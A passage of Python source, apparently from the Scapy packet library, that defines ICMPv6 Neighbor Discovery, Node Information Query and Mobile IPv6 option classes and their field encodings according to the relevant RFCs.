ByteField("plen", 64),
IntField("res", 0),
IP6Field("addr", "::") ]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
fields_desc = [ ByteField("type",18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::") ]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router",
6: "No preifx info available for AP identified by the LLA",
7: "No fast handovers support for AP identified by the LLA" }
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
fields_desc = [ ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY) ] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::") ]
class IP6PrefixField(IP6Field):
__slots__ = ["length_from"]
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8*(pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
l = self.length_from(pkt)
p = s[:l]
if l < 16:
p += '\x00'*(16-l)
return s[l:], self.m2i(pkt,p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
l = pkt.len
if x is None:
x = "::"
if l is None:
l = 1
x = inet_pton(socket.AF_INET6, x)
if l is None:
return x
if l in [0, 1]:
return ""
if l in [2, 3]:
return x[:8*(l-1)]
return x + '\x00'*8*(l-3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ ByteField("type",24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust = lambda pkt,x: x/8 + 1),
ByteField("plen", None),
BitField("res1",0,3),
BitField("prf",0,2),
BitField("res2",0,3),
IntField("rtlifetime", 0xffffffff),
IP6PrefixField("prefix", None) ]
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust = lambda pkt,x: 2*x+1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48) ]
from scapy.layers.dhcp6 import DomainNameListField
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
fields_desc = [ ByteField("type", 31),
FieldLenField("len", None, length_of="searchlist", fmt="B",
adjust=lambda pkt, x: 1+ x/8),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
DomainNameListField("searchlist", [],
length_from=lambda pkt: 8*pkt.len -8,
padded=True)
]
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ ByteEnumField("type", 133, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ ByteEnumField("type", 134, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
ByteField("chlim",0),
BitField("M",0,1),
BitField("O",0,1),
BitField("H",0,1),
BitEnumField("prf",1,2, { 0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low" } ), # RFC 4191
BitField("P",0,1),
BitField("res",0,2),
ShortField("routerlifetime",1800),
IntField("reachabletime",0),
IntField("retranstimer",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ ByteEnumField("type",135, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ ByteEnumField("type",136, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
BitField("R",1,1),
BitField("S",0,1),
BitField("O",1,1),
XBitField("res",0,29),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ ByteEnumField("type",137, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
XIntField("res",0),
IP6Field("tgt","::"),
IP6Field("dst","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ ByteField("type",9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust = lambda pkt,x: 2*x+1),
StrFixedLenField("res", "\x00"*6, 6),
IP6ListField("addrlist", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC3122
# Options requises : source lladdr et target lladdr
# Autres options valides : source address list, MTU
# - Comme precise dans le document, il serait bien de prendre l'adresse L2
# demandee dans l'option requise target lladdr et l'utiliser au niveau
# de l'adresse destination ethernet si aucune adresse n'est precisee
# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
# les options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ ByteEnumField("type",141, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
# Options requises : target lladdr, target address list
# Autres options valides : MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ ByteEnumField("type",142, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept like it has been provided. At the moment, i2repr() will
# crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation).
# [ ] Check if there are differences between different stacks. Among *BSD,
# with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompresiion in
# dnsrepr2names(). Should be deactivable.
icmp6_niqtypes = { 0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address" }
class _ICMPv6NIHashret:
def hashret(self):
return self.nonce
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
# Compute the NI group Address. Can take a FQDN as input parameter
def computeNIGroupAddr(name):
import md5
name = name.lower().split(".")[0]
record = chr(len(name))+name
h = md5.new(record)
h = h.digest()
addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
# Here is the deal. First, that protocol is a piece of shit. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specifc
# type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
# if not overriden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
# if not overriden
# - Name in the other cases: code is set to 0, if not overriden by user
#
# Internal storage, is not only the value, but the a pair providing
# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
and encode it in DNS format (with possible compression)
If a string that is already a DNS name in DNS format
is passed, it is returned unmodified. Result is a string.
!!! At the moment, compression is not implemented !!!
"""
if type(x) is str:
if x and x[-1] == '\x00': # stupid heuristic
return x
x = [x]
res = []
for n in x:
termin = "\x00"
if n.count('.') == 0: # single-component gets one more
termin += '\x00'
n = "".join(map(lambda y: chr(len(y))+y, n.split("."))) + termin
res.append(n)
return "".join(res)
def dnsrepr2names(x):
"""
Take as input a DNS encoded string (possibly compressed)
and returns a list of DNS names contained in it.
If provided string is already in printable format
(does not end with a null character, a one element list
is returned). Result is a list.
"""
res = []
cur = ""
while x:
l = ord(x[0])
x = x[1:]
if l == 0:
if cur and cur[-1] == '.':
cur = cur[:-1]
res.append(cur)
cur = ""
if x and ord(x[0]) == 0: # single component
x = x[1:]
continue
if l & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
else:
cur += x[:l]+"."
x = x[l:]
return res
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
if x is tuple and type(x[0]) is int:
return x
val = None
try: # Try IPv6
inet_pton(socket.AF_INET6, x)
val = (0, x)
except:
try: # Try IPv4
inet_pton(socket.AF_INET, x)
val = (2, x)
except: # Try DNS
if x is None:
x = ""
x = names2dnsrepr(x)
val = (1, x)
return val
def i2repr(self, pkt, x):
t,val = x
if t == 1: # DNS Name
# we don't use dnsrepr2names() to deal with
# possible weird data extracted info
res = []
weird = None
while val:
l = ord(val[0])
val = val[1:]
if l == 0:
if (len(res) > 1 and val): # fqdn with data behind
weird = val
elif len(val) > 1: # single label with data behind
weird = val[1:]
break
res.append(val[:l]+".")
val = val[l:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return "", (1, s)
def addfield(self, pkt, s, val):
if ((type(val) is tuple and val[1] is None) or
val is None):
val = (1, "")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None) ]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
_nireply_code = { 0: "Successful Reply",
1: "Response Refusal",
3: "Unknown query type" }
_nireply_flags = { 1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses" }
# Internal repr is one of those :
# (0, "some string") : unknow qtype value are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decode it for user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if type(x) is not tuple:
if pkt is not None:
qtype = getattr(pkt, "qtype")
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if type(x) is str: # listify the string
x = [x]
if type(x) is list and x and type(x[0]) is not int: # ttl was omitted : use 0
x = [0] + x
ttl = x[0]
names = x[1:]
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if type(x) is str:
x = [x] # User directly provided an IP, instead of list
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
def addttl(x):
if type(x) is str:
return (0, x)
return x
return (qtype, map(addttl, x))
return (qtype, x)
def addfield(self, pkt, s, val):
t,tmp = val
if tmp is None:
tmp = ""
if t == 2:
ttl,dnsstr = tmp
return s+ struct.pack("!I", ttl) + dnsstr
elif t == 3:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET6, y), tmp))
elif t == 4:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET, y), tmp))
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, "")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
elif qtype == 2:
if len(s) < 4:
return s, (0, "")
ttl = struct.unpack("!I", s[:4])[0]
return "", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return "", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if type(x) is tuple and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl,l = val
l = dnsrepr2names(l)
return "ttl:%d %s" % (ttl, ", ".join(l))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda (x,y): "(%d, %s)" % (x, y), val)))
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = ord(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = ord(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
fields_desc = [ ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0) ]
def _hashret(self):
return struct.pack("!H",self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
XBitField("res", 0, 14) ]
def hashret(self):
return struct.pack("!H",self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = { 2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)" }
class _MIP6OptAlign:
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
def alignment_delta(self, curpos):
x = self.x ; y = self.y
if x == 0 and y ==0:
return 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0) ]
x = 2 ; y = 0# alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::") ]
x = 8 ; y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
ByteField('olen', 16),
ShortField('hni', 0),
ShortField('coni', 0) ]
x = 2 ; y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
ByteField('olen', 16),
BitField('authenticator', 0, 96) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::") ]
x = 8 ; y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY) ] # Only support ethernet
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust = lambda pkt,x: x+1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from = lambda pkt: pkt.olen-1) ]
x = 0 ; y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust = lambda pkt,x: x+5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
2: "MN-AAA authentication mobility option"}),
IntField("mspi", None),
StrLenField("authdata", "A"*12,
length_from = lambda pkt: pkt.olen-5) ]
x = 4 ; y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
epoch = (1900, 1, 1, 0, 0, 0, 5, 1, 0)
def i2repr(self, pkt, x):
if x < ((50*31536000)<<32):
return "Some date a few decades ago (%d)" % x
# delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
# January 1st 1970 :
delta = -2209075761
i = int(x >> 32)
j = float(x & 0xffffffff) * 2.0**-32
res = i + j + delta
from time import strftime
t = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
name = "MIPv6 option - Signature"
fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", '\x00'*8,
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign, Packet):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
moboptcls = { 0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest }
# Main Mobile IPv6 Classes
mhtypes = { 0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
